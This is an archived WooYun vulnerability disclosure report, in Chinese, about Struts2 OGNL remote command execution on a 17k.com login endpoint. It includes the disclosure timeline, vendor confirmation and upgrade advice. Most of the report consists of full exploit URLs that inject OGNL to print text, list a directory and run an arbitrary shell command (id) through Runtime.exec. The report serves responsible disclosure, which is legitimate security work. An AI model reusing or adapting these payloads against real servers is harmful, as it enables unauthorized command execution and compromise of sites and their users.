乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2013-07-04: 细节已通知厂商并且等待厂商处理中 2013-07-04: 厂商已经确认,细节仅向厂商公开 2013-07-14: 细节向核心白帽子及相关领域专家公开 2013-07-24: 细节向普通白帽子公开 2013-08-03: 细节向实习白帽子公开 2013-08-18: 细节向公众公开
17k小说网某站点远程命令执行(影响多个站点)!
Struts2远程命令执行漏洞:
http://cu.17k.com/login.action
简单测试下--输出"wooyun":
http://cu.17k.com/login.action?('\43_memberAccess[\'allowStaticMethodAccess\']')(meh)=true&(aaa)(('\43context[\'xwork.MethodAccessor.denyMethodExecution\']\75false')(d))&('\43c')(('\43_memberAccess.excludeProperties\[email protected]@EMPTY_SET')(c))&(asdf)(('\43rp\[email protected]@getResponse()')(c))&(fgd)(('\43rp.getWriter().print("woo")')(d))&(fgd)(('\43rp.getWriter().print("yun")')(d))&(grgr)(('\43rp.getWriter().close()')(d))=1
列出当前目录:
http://cu.17k.com/login.action?('\43_memberAccess.allowStaticMethodAccess')(a)=true&(b)(('\43context[\'xwork.MethodAccessor.denyMethodExecution\']\75false')(b))&('\43c')(('\43_memberAccess.excludeProperties\[email protected]@EMPTY_SET')(c))&(g)(('\43mycmd\75\'ls\40\u002dl\'')(d))&(h)(('\43myret\[email protected]@getRuntime().exec(\43mycmd)')(d))&(i)(('\43mydat\75new\40java.io.DataInputStream(\43myret.getInputStream())')(d))&(j)(('\43myres\75new\40byte[51020]')(d))&(k)(('\43mydat.readFully(\43myres)')(d))&(l)(('\43mystr\75new\40java.lang.String(\43myres)')(d))&(m)(('\43myout\[email protected]@getResponse()')(d))&(n)(('\43myout.getWriter().println(\43mystr)')(d))
当前用户:
http://cu.17k.com/login.action?('\43_memberAccess.allowStaticMethodAccess')(a)=true&(b)(('\43context[\'xwork.MethodAccessor.denyMethodExecution\']\75false')(b))&('\43c')(('\43_memberAccess.excludeProperties\[email protected]@EMPTY_SET')(c))&(g)(('\43req\[email protected]@getRequest()')(d))&(h)(('\43webRootzpro\[email protected]@getRuntime().exec(\43req.getParameter(%22cmd%22))')(d))&(i)(('\43webRootzproreader\75new\40java.io.DataInputStream(\43webRootzpro.getInputStream())')(d))&(i01)(('\43webStr\75new\40byte[51020]')(d))&(i1)(('\43webRootzproreader.readFully(\43webStr)')(d))&(i111)(('\43webStr12\75new\40java.lang.String(\43webStr)')(d))&(i2)(('\43xman\[email protected]@getResponse()')(d))&(i2)(('\43xman\[email protected]@getResponse()')(d))&(i95)(('\43xman.getWriter().println(\43webStr12)')(d))&(i99)(('\43xman.getWriter().close()')(d))&cmd=id
.........and so on!!! 同服的其它站点:
如上所述!
[1]下载最新的版本2.3.4:http://struts.apache.org/download.cgi#struts234[2]或者修改对应jar中的ongl处理逻辑,然后编译打包替换旧的文件。
危害等级:中
漏洞Rank:8
确认时间:2013-07-04 09:41
十分感谢leaf同学,感谢你关注17k
暂无